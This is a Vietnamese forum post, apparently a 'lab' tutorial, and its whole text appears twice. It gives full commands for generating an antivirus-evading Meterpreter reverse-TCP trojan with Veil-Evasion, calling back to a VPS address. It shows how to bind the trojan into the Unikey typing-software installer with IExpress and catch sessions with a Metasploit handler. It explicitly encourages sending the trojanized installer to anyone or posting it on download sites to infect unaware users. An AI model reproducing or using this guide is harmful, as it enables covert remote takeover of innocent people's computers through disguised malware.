Hackerstudent93
VIP Members
-
30/09/2013
-
38
-
340 bài viết
Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows
Lab hacker : Sử dụng tool Veil-Evasion trong kali linux tạo Trojan, sau đó đính kèm với một tập tin cài đặt .exe khác như Unikey, Ccleaner.... sử dụng Iexpress trong Windows, kết hợp với VPS đã cài sẵn Metasploit đế tấn công ngoài mạng Wan.
Điều kiện:
-1. Máy ảo sử dụng OS kali linux có metasploit và Veil-Evasion
-2. VPS đã cài sẵn Metasploit
-3. Máy thật sử dụng OS windows đã có sẵn công cụ Iexpress
-4. Đối tượng tấn công: Tất cả hệ điều hành Windows như Xp, Windows 7, Windows 8, Windows Server 2003, Windows Server 2008
Đầu tiên: Ta vào OS Kali linux khởi động Veil-Evasion
- Tham khảo về Veil-Evasion và hướng dẫn cài đặt ở đây:
- Khai báo các thông số và thiết lập để chuẩn bị tấn công.
- cd /root/Desktop
- cd Veil-Evasion-master
- ls
- ./Veil-Evasion.py ( để khởi chạy Veil-Evasion )
- list ( liệt kê tất cả danh sách payloads mà Veil-Evasion có thể khai thác )
- use python/meterpreter/rev_tcp ( sử dụng phương thức meterpreter/rev_tcp để tấn công )
- set LHOST 14.0.21.24 ( địa chỉ IP của VPS)
- set LPORT 4444 ( port mà bạn lắng nghe )
- set compile_to_exe Y ( Biên dịch để thực thi một file )
- generate ( tạo ra payload )
- please enter the base name for output files: ( nhập tên con trojan mà bạn muốn Veil-Evasion biên dịch ra là gì ? )
- How would you like to create your payload executable? ( Bạn muốn tạo payload sẽ thực thi giống như thế nào ? )
1 - Pyinstaller ( default )
2 - Py2Exe
- ở đây tôi chọn mặc định, nhấn 1 và gõ Enter
- file thực thi đã được viết ở /root/veil-oupt/compiled/virus.exe giờ mình sẽ di chuyển nó ra ngoài Destop với lệnh sau mv /root/veil-oupt/compiled/virus.exe /root/Desktop, sau đó copy nó ra ngoài windows và đính kèm vào phần mềm gõ tiếng việt Unikey
- Lưu ý: để Veil-Evasion có thể hoạt động tốt và tránh bị phần mềm diệt virus" làm thịt " thì các bạn nhớ là update Veil-Evasion để có hiệu quả tốt nhất nhá , tỉ lệ thành công là tuyệt đối 100%, các bạn tạo virus ra thì upload nó lên https://www.virustotal.com/ để kiểm tra xem thằng nào " làm thịt " đước nhá
- Windows:
- Các bạn download Unikey về, sau đó đi đến Start vào gõ Iexpress
- Copy con trojan mà Veil-Evasion tạo ra sẵn ngoài Desktop nhé
- Tiếp theo thì các bạn nhìn Trong Video mình hướng dẫn.
-VPS
- VPS của mình có địa chỉ là 14.0.21.24
- VPS đã cài sẵn Metasploit http://www.rapid7.com/products/metasploit/download.jsp tải về ở đây.
- Sau khi cài đặt Metasploit thì khởi chạy nó lên vào gõ các lệnh sau:
- use exploit/windows/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 14.0.21.24 ( địa chỉ của VPS )
- set lport 4444 ( port lắng nghe )
- exploit
- Tiếp theo là nghịch thôi, một khi đã dính khởi chạy Unikey rồi công việc còn lại là số phận của máy tính đó là do các bạn định đoạt, ở đây tôi không nhắc lại các lệnh trong Metasploit, các bạn tự tìm hiểu nha , bây giờ bạn có thể gởi cho bất kì một ai đó chạy phần mềm Unikey này, hoặc upload lên trang download nào đó để mọi người có thể tải về và sử dụng, khi phần mềm
Unikey được chạy thì cũng đồng nghĩa với việc chạy luôn con virus ở hệ thống mà người dùng bình thường không hề hay biết, nếu tinh ý thì có thể dùng các lệnh nestat -a, hay xem trong Task manager các bạn tự tìm hiểu nhá.
Điều kiện:
-1. Máy ảo sử dụng OS kali linux có metasploit và Veil-Evasion
-2. VPS đã cài sẵn Metasploit
-3. Máy thật sử dụng OS windows đã có sẵn công cụ Iexpress
-4. Đối tượng tấn công: Tất cả hệ điều hành Windows như Xp, Windows 7, Windows 8, Windows Server 2003, Windows Server 2008
Đầu tiên: Ta vào OS Kali linux khởi động Veil-Evasion
- Tham khảo về Veil-Evasion và hướng dẫn cài đặt ở đây:
- Khai báo các thông số và thiết lập để chuẩn bị tấn công.
- cd /root/Desktop
- cd Veil-Evasion-master
- ls
- ./Veil-Evasion.py ( để khởi chạy Veil-Evasion )
- list ( liệt kê tất cả danh sách payloads mà Veil-Evasion có thể khai thác )
- use python/meterpreter/rev_tcp ( sử dụng phương thức meterpreter/rev_tcp để tấn công )
- set LHOST 14.0.21.24 ( địa chỉ IP của VPS)
- set LPORT 4444 ( port mà bạn lắng nghe )
- set compile_to_exe Y ( Biên dịch để thực thi một file )
- generate ( tạo ra payload )
- please enter the base name for output files: ( nhập tên con trojan mà bạn muốn Veil-Evasion biên dịch ra là gì ? )
- How would you like to create your payload executable? ( Bạn muốn tạo payload sẽ thực thi giống như thế nào ? )
1 - Pyinstaller ( default )
2 - Py2Exe
- ở đây tôi chọn mặc định, nhấn 1 và gõ Enter
- file thực thi đã được viết ở /root/veil-oupt/compiled/virus.exe giờ mình sẽ di chuyển nó ra ngoài Destop với lệnh sau mv /root/veil-oupt/compiled/virus.exe /root/Desktop, sau đó copy nó ra ngoài windows và đính kèm vào phần mềm gõ tiếng việt Unikey
- Lưu ý: để Veil-Evasion có thể hoạt động tốt và tránh bị phần mềm diệt virus" làm thịt " thì các bạn nhớ là update Veil-Evasion để có hiệu quả tốt nhất nhá , tỉ lệ thành công là tuyệt đối 100%, các bạn tạo virus ra thì upload nó lên https://www.virustotal.com/ để kiểm tra xem thằng nào " làm thịt " đước nhá
- Windows:
- Các bạn download Unikey về, sau đó đi đến Start vào gõ Iexpress
- Copy con trojan mà Veil-Evasion tạo ra sẵn ngoài Desktop nhé
- Tiếp theo thì các bạn nhìn Trong Video mình hướng dẫn.
-VPS
- VPS của mình có địa chỉ là 14.0.21.24
- VPS đã cài sẵn Metasploit http://www.rapid7.com/products/metasploit/download.jsp tải về ở đây.
- Sau khi cài đặt Metasploit thì khởi chạy nó lên vào gõ các lệnh sau:
- use exploit/windows/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 14.0.21.24 ( địa chỉ của VPS )
- set lport 4444 ( port lắng nghe )
- exploit
- Tiếp theo là nghịch thôi, một khi đã dính khởi chạy Unikey rồi công việc còn lại là số phận của máy tính đó là do các bạn định đoạt, ở đây tôi không nhắc lại các lệnh trong Metasploit, các bạn tự tìm hiểu nha , bây giờ bạn có thể gởi cho bất kì một ai đó chạy phần mềm Unikey này, hoặc upload lên trang download nào đó để mọi người có thể tải về và sử dụng, khi phần mềm
Unikey được chạy thì cũng đồng nghĩa với việc chạy luôn con virus ở hệ thống mà người dùng bình thường không hề hay biết, nếu tinh ý thì có thể dùng các lệnh nestat -a, hay xem trong Task manager các bạn tự tìm hiểu nhá.
Chỉnh sửa lần cuối bởi người điều hành: